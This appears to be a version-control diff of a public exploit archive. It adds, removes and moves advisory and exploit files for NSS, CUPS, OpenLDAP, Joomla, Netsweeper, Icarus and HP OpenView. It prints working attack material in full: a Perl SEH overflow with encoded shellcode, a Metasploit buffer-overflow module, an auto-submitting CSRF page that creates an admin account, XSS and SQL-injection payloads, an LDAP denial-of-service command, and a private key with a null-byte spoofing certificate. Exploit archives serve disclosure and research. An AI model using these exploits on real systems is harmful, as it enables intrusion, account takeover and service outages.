ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2

155
platforms/linux/remote/33128.txt
View file

@ -1,155 +0,0 @@
source: http://www.securityfocus.com/bid/35888/info
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
Private-Key: (1024 bit)
modulus:
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
ce:f0:82:33:d8:76:06:4c:9f
publicExponent: 65537 (0x10001)
privateExponent:
00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
57:2c:78:a9:42:b2:49:d8:71
prime1:
00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
e6:3a:40:99:03
prime2:
00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
49:79:53:35:35
exponent1:
15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
77:eb:0d:c1
exponent2:
5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
2d:92:6e:ed
coefficient:
00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
e6:c2:29:86:17
Certificate Request:
Data:
Version: 0 (0x0)
Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
ce:f0:82:33:d8:76:06:4c:9f
Exponent: 65537 (0x10001)
Attributes:
a0:00
Signature Algorithm: md5WithRSAEncryption
64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
a2:dc
-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
otw=
-----END CERTIFICATE REQUEST-----
-----BEGIN CERTIFICATE-----
MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
-----END CERTIFICATE-----

12
platforms/linux/remote/33339.txt
View file

@ -1,12 +0,0 @@
source: http://www.securityfocus.com/bid/36958/info
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
This issue affects versions prior to CUPS 1.4.2.
http://www.example.com/admin/?kerberos=onmouseover=alert

42
platforms/linux/webapps/14114.txt
View file

@ -1,42 +0,0 @@
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : I-net Multi User Email Script SQLi Vulnerability
Date : june, 27 2010
Critical Level : HIGH
Vendor Url : http://www.i-netsolution.com/
Google Dork: inurl:/jobsearchengine/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
i-Net Multi User Email Script to start your own Email Website like GMAIL, YAHOO Mail, Hot Mail made in CGI/PERL, tested over Linux
Servers. Features of i-Net Multi User Email Script, Advanced Spam Filtering, RBL Blacklisting, Completely MIME compatible, Contact List
Members Filter Proof, Multiple Skins, Limit Users Outgoing Mail (Depending on User Level) Sort Inbox With Several Criteria, Fully
customizable via HTML templates, Mod_Perl Compatible, New Mail Sounds, WYSIWYG Mail Interface, Multiple Tiered Premium Accounts, Premium
Accounts using Paypal & Subscriptions, SMTP or Send mail, Fully functional calendar and scheduler, Unlimited User Folders, Folder Filtering
(Incoming mail directed to specific folders), Email notifications of new mail, MySQL backend, Backup, Powerful Admin Panel, Ban IP, Advanced
User Editing, Account Suspensions, User Address Book, i-Net Talk and many more features.
#######################################################################################################
Xploit: SQLi VUlnerability
The I-net Multi User Email Script has SQli vuln :D
DEMO URL : http://xxxx.com/php121_editname.php?uid=[sqli]
###############################################################################################################
# 0day no more
# Sid3^effects

16
platforms/multiple/dos/10077.txt
View file

@ -1,3 +1,15 @@
Attackers use readily available LDAP commands to exploit this issue. The following command demonstrates this issue:
Attackers use readily available LDAP commands to exploit this issue.
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
source: http://www.securityfocus.com/bid/27778/info
OpenLDAP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny service to legitimate users.
OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2

16
platforms/multiple/remote/10001.txt
View file

@ -2,4 +2,18 @@ Attackers can exploit this issue by enticing an unsuspecting victim into followi
The following example URI is available:
http://www.example.com/admin/?kerberos=onmouseover=alert
http://www.example.com/admin/?kerberos=onmouseover=alert
source: http://www.securityfocus.com/bid/36958/info
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
This issue affects versions prior to CUPS 1.4.2.

12
platforms/multiple/remote/10071.txt
View file

@ -1,3 +1,13 @@
source: http://www.securityfocus.com/bid/35888/info
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
Private-Key: (1024 bit)
modulus:
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
@ -142,4 +152,4 @@ BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
-----END CERTIFICATE-----
-----END CERTIFICATE-----

4
platforms/multiple/remote/19426.c
View file

@ -1,6 +1,8 @@
source: http://www.securityfocus.com/bid/530/exploit
/*
source: http://www.securityfocus.com/bid/530/info
The SGI Array Services provide a mechanism to simplify administering and managing an array of clustered systems. The arrayd(1m) program is part of the array_services(5) and is known as the array services daemon. The default configuration for authorization makes clustered systems vulnerable to remote root compromises. The array services are installed on Irix systems by default from the Irix applications CD. All versions of Unicos post 9.0.0 are vulnerable.
*/
/*## copyright LAST STAGE OF DELIRIUM aug 1999 poland *://lsd-pl.net/ #*/
/*## arrayd #*/

2
platforms/multiple/remote/21880.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/5829/exploit
source: http://www.securityfocus.com/bid/5829/info
Monkey HTTP server is prone to cross site scripting vulnerabilities.

8
platforms/multiple/remote/9993.txt
View file

@ -1 +1,7 @@
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
source: http://www.securityfocus.com/bid/34383/info
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

34
platforms/php/webapps/11983.txt
View file

@ -1,34 +0,0 @@
[~]######################################### InformatioN #############################################[~]
[~] Title : Joomla Component com_actions SQL Injection Vulnerability
[~] Author : DevilZ TM By D3v1l
[~] Homepage : http://www.DEVILZTM.com
[~] Email : Expl0it@DevilZTM.Com
[~] Contact : D3v1l.blackhat@yahoo.com
[~]######################################### ExploiT #############################################[~]
[~] Vulnerable File :
http://127.0.0.1/index.php?option=com_actions&actionid=[SQL]
[~] ExploiT :
-1 UNION SELECT 1,2,3,4,5,6,7--
[~] Example :
http://127.0.0.1/index.php?option=com_actions&actionid=-1 UNION SELECT 1,2,3,4,5,6,7--
[~]######################################### ThankS To ... ############################################[~]
[~] Special Thanks To My Best FriendS :
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
[~] IRANIAN Young HackerZ
[~] GreetZ : Exploit-DB TeaM
[~]######################################### FinisH :D #############################################[~]

68
platforms/php/webapps/19714.txt
View file

@ -1,68 +0,0 @@
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and "The later"
# Date: Discovered and reported CSRF and XSS reported 4/2012 and "The later" reported 7/2012
# Author: Jacob Holcomb/Gimppy042
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)
# CVE :  CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and CVE-2012-3859 for the "The later"
 *NOTE:
# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.
 
CSRF Exploitation:
In the following example we use CSRF to forge a HTTP POST request that will create an administrator account. The user must be logged in for CSRF to work. Exploitation of a non-administrative users (Sys op) account results in creation of a standard user account.
<head>
<title>CSRF Create Admin - Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
</head>
<body>
<form name="pwnd" action="http://server.domain_name/webadmin/accountmgr/adminupdate.php?act=add&filter_login=&goodmsg=Account+Added" method="post">
<input type="hidden" name="userid" value="netsweeperPWND" />
<input type="hidden" name="firstname" value="Jacob" />
<input type="hidden" name="lastname" value="Holcomb" />
<input type="hidden" name="email" value="pwnd@pwnd.com" />
<input type="hidden" name="organization" value="yep_PWND" />
<input type="hidden" name="description" value="PWND" />
<input type="hidden" name="pass1" value="Pwnd-321" />
<input type="hidden" name="pass2" value="Pwnd-321" />
<input type="hidden" name="classification" value="admin" />
<input type="hidden" name="expire" value="" />
<input type="hidden" name="accounttheme" value="" />
<input type="hidden" name="accountpmtheme" value="gpmtheme" />
<script>
document.pwnd.submit();
</script>
</body>
XSS Exploitation:
The following POC code exploits a reflective XSS vulnerability using the HTTP POST method.
<head>
<title>Post XSS(Reflective) Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
</head>
<body>
<form name="pwnd" action="http:// server.domain_name
/webadmin/tools/local_lookup.php?action=lookup" method="post">
<input type="hidden" name="user" value="pwnd" />
<input type="hidden" name="group" value="><script>alert('XSS')</script>" />
<input type="hidden" name="policy" value="pwnd" />
<input type="hidden" name="url" value="pwnd" />
<script>
document.getElementById('pwnd').submit();
</script>
</body>
"The later" Exploitation:
Coming soon... : )

2
platforms/php/webapps/27303.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/16794/
source: http://www.securityfocus.com/bid/16794/info
Oi! Email Marketing System is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

2
platforms/php/webapps/31216.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/27830/
source: http://www.securityfocus.com/bid/27830/info
The Joomla! and Mambo 'com_scheduling' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

7
platforms/unix/remote/32890.txt
View file

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/34383/info
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

39
platforms/windows/local/10107.pl
View file

@ -1,39 +0,0 @@
#!/user/bin/perl
#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
#tested on win SP2
#Author: germaya_x & D3v!LFUCK3R
#Download :http://www.randomsoftware.com/pub/icarus.exe
#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)
#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :)
#############################################################
my $bof="A" x 332 ;
my $NEXT_sEh="\xEB\x06\x90\x90";
my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
###################################################################
open(myfile,'>> exploit.pgn');
print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;
###################################################################

5
platforms/windows/local/14566.c
View file

@ -1,6 +1,5 @@
source:
http://www.ragestorm.net/blogs/?p=255
http://secunia.com/advisories/40870/
source: http://www.ragestorm.net/blogs/?p=255
source: http://secunia.com/advisories/40870/
DEVMODE dm = {0};

74
platforms/windows/remote/17536.rb
View file

@ -1,74 +0,0 @@
##
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13192 $',
'References' =>
[
[ 'CVE', '2008-0067' ],
[ 'OSVDB', '53222' ],
[ 'BID', '33147' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 7 2009'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded
print_status("Trying target #{target.name}...")
send_request_raw({
'uri' => "/OvCgi/Toolbar.exe?" + sploit,
'method' => "GET",
}, 5)
handler
end
end

2
platforms/windows/remote/20528.html
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/2167/exploit
source: http://www.securityfocus.com/bid/2167/info
Windows Media Player is an application used for digital audio, and video content viewing. It can be embedded in webpages as an ActiveX control.